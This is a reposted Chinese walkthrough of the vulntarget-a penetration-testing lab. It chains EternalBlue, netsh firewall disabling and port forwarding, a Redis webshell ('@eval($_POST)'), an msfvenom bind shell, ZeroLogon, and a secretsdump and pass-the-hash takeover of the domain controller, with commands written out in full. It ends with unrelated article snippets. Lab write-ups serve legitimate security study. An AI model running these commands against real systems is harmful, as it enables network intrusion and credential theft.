vulntarget-a

news2024/11/17 23:18:05

在这里插入图片描述

实际部署之后的win7 ip: 192.168.127.128
具体攻击过程如下

win7

扫描服务

使用fscan扫描win 7中的服务以及漏洞

 ./fscan -h 192.168.127.128 

在这里插入图片描述

扫出来一个ms17-010以及通达oa的漏洞,既然有永恒之蓝的,直接上MSF就行了

msf6 > search ms17-010
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.127.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.127.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 32463
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

成功拿到meterpreter

在这里插入图片描述

查看当前主机的网段信息

这里假装不知道当前主机的网段信息

meterpreter > shell
C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7-PC
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : localdomain

Ethernet adapter Bluetooth θçl½Ѻ

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Bluetooth ʨ±¸(¸󉌇𳎸)
   Physical Address. . . . . . . . . : 3C-58-C2-68-2A-6C
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter ±¾µف¬½Ѡ2:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-D7-3A-42
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::acaf:ab76:dfe8:2c06%13(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.0.20.98(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-22-BE-AC-00-0C-29-B3-DB-08
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter ±¾µف¬½Ѻ

   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-D7-3A-38
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::4501:76e7:5c8e:86a1%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.127.128(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2024Ū7Ղ12ɕ 8:09:34
   Lease Expires . . . . . . . . . . : 2024Ū7Ղ12ɕ 14:54:26
   Default Gateway . . . . . . . . . : 
   DHCP Server . . . . . . . . . . . : 192.168.127.254
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-22-BE-AC-00-0C-29-B3-DB-08
   DNS Servers . . . . . . . . . . . : 192.168.127.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

可以看出来当前主机并没有处于域环境,而且存在192.168.127.1/2410.0.20.1/24两个网段

横向移动拿下win2016

设置路由

run post/multi/manage/autoroute    #自动添加路由
run autoroute -p    #打印查看的路由

可见10.0.20.1/24网段已经被添加进去了
在这里插入图片描述

扫描内网主机

扫描内网主机的方式有很多种,也可以直接使用MSF进行扫描,也可以上传一个fscan进行扫描,也可以直接搭建一个socks代理服务进行扫描

扫描存活

这里使用arp扫描

use post/windows/gather/arp_scanner
set rhosts 10.0.20.1-254
set session 1
run

扫描结果
在这里插入图片描述

10.0.20.99是未知的内网主机,接下来就对其进横向移动

先搭建一个socks5代理,然后通过nmap进行扫描10.0.20.99目标开放的服务

socks5代理搭建
background
use auxiliary/server/socks_proxy   #搭建代理服务,默认端口1080
run

搭建完之后,使用proxychains4 结合扫描工具进行扫描,proxychains4需要在/etc/proxychains4.conf文件修改代理配置,这里不在赘述。

nmap扫描目标主机开放服务

挂上代理,扫描特别慢,这里就扫描部分端口

proxychains nmap -Pn -sT  10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080

扫描结果

Host is up (12s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
1433/tcp closed ms-sql-s
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
6379/tcp open   redis
8080/tcp closed http-proxy

可见目标主机开启了80,6379端口

扫描10.0.20.99目标主机80端口目录

在使用msf中的socks代理结合dirsearch目录扫描工具时,老是把代理扫崩,所以直接使用windows自带的netsh端口转发,将wind7系统的5631端口转发给内网主机win201680端口上面,这样就可以不使用代理来访问内网主机中的web服务了。

使用Netsh端口转发

在win7的shell中执行这个命令即可

#关闭win7防火墙
netsh firewall set opmode mode = disable

#进行端口转发
netsh interface portproxy add v4tov4 listenport=5631 connectaddress=10.0.20.99 connectport=80

此时访问win7的5631端口就能访问到win2016主机的80端口了

由于给win7主机切换了一下网卡,导致其出网网卡的IP变为192.168.129.130

使用dirsearch进行目录扫描

python3 dirsearch.py -u http://192.168.127.130:5631/ 

扫描结果
在这里插入图片描述

l.php是一个探针
在这里插入图片描述

phpinfo也没啥好说的,由此看来80端口应该是没什么打的了,那试试6379端口

redis未授权写入webshell

redis最经典的漏洞莫非未授权了,先试试未授权

proxychains redis-cli -h 10.0.20.99

发现可以直接连上,那就是未授权了,直接打就完了,在phpinfo和探针里面都可以获取到web网站的路径,路径已知,那就写个🐎上去。

config set dir "C:/phpStudy/PHPTutorial/www/"
config set dbfilename a.php
set x "<?php @eval($_POST['cmd']);?>"
save

在这里插入图片描述

webshell写入成功,尝试蚁剑连接
在这里插入图片描述

连接成功,此时win2016这台主机就已经拿下了。

在win2016主机中查看当前网络信息,可以看到主DNS后缀,说明其是域内主机,并且发现了一个未知的IP段10.0.10.1/24
在这里插入图片描述

MSF上线win2016

我的思路是先使用msf上线win2016, 然后再进行横向移动到域控
msf生成正向的shell木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=7411 -f exe -o 7411.exe

将生成的木马通过蚁剑上传到win2016中
然后蚁剑中将win2016的防火墙关闭,要不然正向shell连不进去

netsh firewall set opmode mode = disable

打开MSF

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
set lport 7411
run

然后在蚁剑中运行木马
成功拿到了win2016的meterpreter
然后在进行一个进程迁移,省的一会再掉线了

run post/windows/manage/migrate

通过arp缓存查看内网主机

arp -a

在这里插入图片描述

刚刚我们看到的10.0.10.1/24网段只有一个10.0.10.110主机,那这个ip也大概就是域控,或者直接通过MSF查看

run post/windows/gather/enum_domain

在这里插入图片描述

域控

扫描域控

通过蚁剑在win2016中上上传一个fscan,扫一下域控,看看开放了什么端口,有没有部署其他的服务。
在这里插入图片描述

开放了一些端口,没扫出来什么漏洞。

为域控添加路由

在win2016的meterpreter中执行

run post/multi/manage/autoroute  

设置win2016为代理服务器

use auxiliary/server/socks_proxy
run

在下一步怎么进展这卡了半天,最后还是看官方文档的步骤才搞出来的
使用 # ZeroLogon (CVE-2020-1472)
POC: https://github.com/dirkjanm/CVE-2020-1472
按照传闻,运行这个脚本会将域控密码置空,说实在的,有点离谱😲

proxychains python cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控的hash,这里使用kali自带的impacket-secretsdump工具

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述

拿到hash之后,再使用WMIC进行登入到域控

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110

拿下域控☠️

在这里插入图片描述

总结

说一下思路,先使用永恒之蓝漏洞打win7,然后在将win2016的web端口给转发出来,通过扫描目录看到phpinfo文件,得到网站目录,然后再通过redis未授权漏洞写入shell,拿下win2016,域控是用CVE-2020-1472打的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1955452.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

架子鼓鼓谱制谱什么软件好 Guitar Pro怎么编鼓谱

对那些想学架子鼓又缺乏预算的朋友来说&#xff0c;通过架子鼓谱子软件来模拟学习也是个不错的选择。不过&#xff0c;由于市面上类似的软件过多&#xff0c;许多人都挑花了眼&#xff01;那么&#xff0c;架子鼓谱子软件哪个比较好用呢&#xff1f;下面小编就来推荐几款好用的…

HTML--JavaScript操作DOM对象

目录 本章目标 一.DOM对象概念 ​编辑 二.节点访问方法 常用方法&#xff1a; 层次关系访问节点 三.节点信息 四.节点的操作方法 操作节点的属性 创建节点 删除替换节点 五.节点操作样式 style属性 class-name属性 六.获取元素位置 总结 本章目标 了解DOM的分类和节…

【论文精读】 | 基于图表示的视频抑郁症识别的两阶段时间建模框架

文章目录 0、Description1、Introduction2、Related work2.1 Relationship between depression and facial behaviours2.2 Video-based automatic depression analysis2.3 Facial graph representation 3、The proposed two-stage approach3.1 Short-term depressive behaviour…

18746 逆序数

这个问题可以使用归并排序的思想来解决。在归并排序的过程中&#xff0c;我们可以统计逆序数的数量。当我们合并两个已经排序的数组时&#xff0c;如果左边的数组中的元素&#xfffd;&#xfffd;于右边的数组中的元素&#xff0c;那么就存在逆序&#xff0c;逆序数的数量就是…

力扣SQL50 按分类统计薪水 条件统计

Problem: 1907. 按分类统计薪水 文章目录 思路Code 思路 &#x1f468;‍&#x1f3eb; 参考题解 Code SELECT Low Salary AS category,SUM(CASE WHEN income < 20000 THEN 1 ELSE 0 END) AS accounts_count FROM AccountsUNION SELECT Average Salary category,SUM(C…

DBus快速入门

DBus快速入门 参考链接&#xff1a; 中文博客&#xff1a; https://www.e-learn.cn/topic/1808992 https://blog.csdn.net/u011942101/article/details/123383195 https://blog.csdn.net/weixin_44498318/article/details/115803936 https://www.e-learn.cn/topic/1808992 htt…

Vue3 Pinia的创建与使用代替Vuex 全局数据共享 同步异步

介绍 提供跨组件和页面的共享状态能力&#xff0c;作为Vuex的替代品&#xff0c;专为Vue3设计的状态管理库。 Vuex&#xff1a;在Vuex中&#xff0c;更改状态必须通过Mutation或Action完成&#xff0c;手动触发更新。Pinia&#xff1a;Pinia的状态是响应式的&#xff0c;当状…

JAVA中的异常:异常的分类+异常的处理

文章目录 1. 异常的分类1.1 Error1.2 Exception1.2.1 运行时异常1.2.2 非运行时异常 2.异常的处理2.1 try catch用法2.2 throws和throw的区别 1. 异常的分类 Throwable类&#xff08;表示可抛&#xff09;是所有异常和错误的超类&#xff0c;两个直接子类为Error和Exception分…

C++11新特性——智能指针——参考bibi《 原子之音》的视频以及ChatGpt

智能指针 一、内存泄露1.1 内存泄露常见原因1.2 如何避免内存泄露 二、实例Demo2.1 文件结构2.2 Dog.h2.3 Dog.cpp2.3 mian.cpp 三、独占式智能指针:unique _ptr3.1 创建方式3.1.1 ⭐从原始(裸)指针转换&#xff1a;3.1.2 ⭐⭐使用 new 关键字直接创建&#xff1a;3.1.3 ⭐⭐⭐…

敏感信息泄露wp

1.右键查看网页源代码 2.前台JS绕过&#xff0c;ctrlU绕过JS查看源码 3.开发者工具&#xff0c;网络&#xff0c;查看协议 4.后台地址在robots,拼接目录/robots.txt 5.用dirsearch扫描&#xff0c;看到index.phps,phps中有源码&#xff0c;拼接目录&#xff0c;下载index.phps …

【Go - context 速览,场景与用法】

作用 context字面意思上下文&#xff0c;用于关联管理上下文&#xff0c;具体有如下几个作用 取消信号传递&#xff1a;可以用来传递取消信号&#xff0c;让一个正在执行的函数知道它应该提前终止。超时控制&#xff1a;可以设定一个超时时间&#xff0c;自动取消超过执行时间…

Oat++ 后端实现跨域

这里记录在官方的例子中&#xff0c;加入跨域。Oat Example-CRUD 在官方的例子中&#xff0c;加入跨域。 Oat Example-CRUD 修改AppComponent.hpp文件中的代码&#xff0c;如下&#xff1a; #include "AppComponent.hpp"#include "controller/UserController…

8、从0搭建企业门户网站——网站部署

目录 正文 1、域名解析 2、云服务器端口授权 3、Mysql数据库初始化 4、上传网站软件包 5、Tomcat配置 6、运行Tomcat 7、停止Tomcat 8、部署后发现验证码无法使用 完毕! 正文 当云服务器租用、域名购买和软件开发都完成后,我们就可以开始网站部署上线,ICP备案会长…

表达式的转换

题目&#xff1a; 表达式的转换 - 洛谷 P1175 - Virtual Judge 思路&#xff1a; 这道题可以拆成两问&#xff1a; 第一问&#xff0c;将中缀表达式转成后缀表达式放入一个数组 第二问&#xff0c;将后缀表达式的数组计算&#xff0c;并输出过程 第一问思路&#xff1a; …

Python高维度大型气象矩阵存储策略分享

零、前情提要 最近需要分析全球范围多变量的数值预报数据&#xff0c;将grb格式的数据下载下来经过一通处理后需要将预处理数据先保存一遍&#xff0c;方便后续操作&#xff0c;处理完发现此时的数据维度很多&#xff0c;数据量巨大&#xff0c;使用不同的保存策略的解析难度和…

信息安全技术解析

在信息爆炸的今天&#xff0c;信息技术安全已成为社会发展的重要基石。随着网络攻击的日益复杂和隐蔽&#xff0c;保障数据安全、提升防御能力成为信息技术安全领域的核心任务。本文将从加密解密技术、安全行为分析技术和网络安全态势感知技术三个方面进行深入探讨&#xff0c;…

C++笔试强训9

文章目录 一、选择题1-5题6-10题 二、编程题题目一题目二 一、选择题 1-5题 函数形参是个int类型的引用&#xff0c;传参的时候直接传一个int类型的变量就行 故选A 1.malloc/calloc/realloc—>free 2. new / delete 3. new[] / delete[] 一定要匹配起来使用&#xff0c;否则…

猫头虎分享:Numpy知识点一文带你详细学习np.random.randn()

&#x1f42f; 猫头虎分享&#xff1a;Numpy知识点一文带你详细学习np.random.randn() 摘要 Numpy 是数据科学和机器学习领域中不可或缺的工具。在本篇文章中&#xff0c;我们将深入探讨 np.random.randn()&#xff0c;一个用于生成标准正态分布的强大函数。通过详细的代码示…

ADS 使用教程(二十九)Understanding Bounding Area Layer for FEM

上一篇&#xff1a;ADS 使用教程&#xff08;二十八&#xff09;Working with FEM Mesh & Field Data in ADS 这一节&#xff0c;我们来一起了解一下有限元法&#xff08;FEM&#xff09;中的边界区域层&#xff08;Bounding Area Layer&#xff09;&#xff0c;这是定义仿…

python项目实例和源码权限管理系统

✌网站介绍&#xff1a;✌10年项目辅导经验、专注于计算机技术领域学生项目实战辅导。 ✌服务范围&#xff1a;Java(SpringBoo/SSM)、Python、PHP、Nodejs、爬虫、数据可视化、小程序、安卓app、大数据等设计与开发。 ✌服务内容&#xff1a;免费功能设计、免费提供开题答辩P…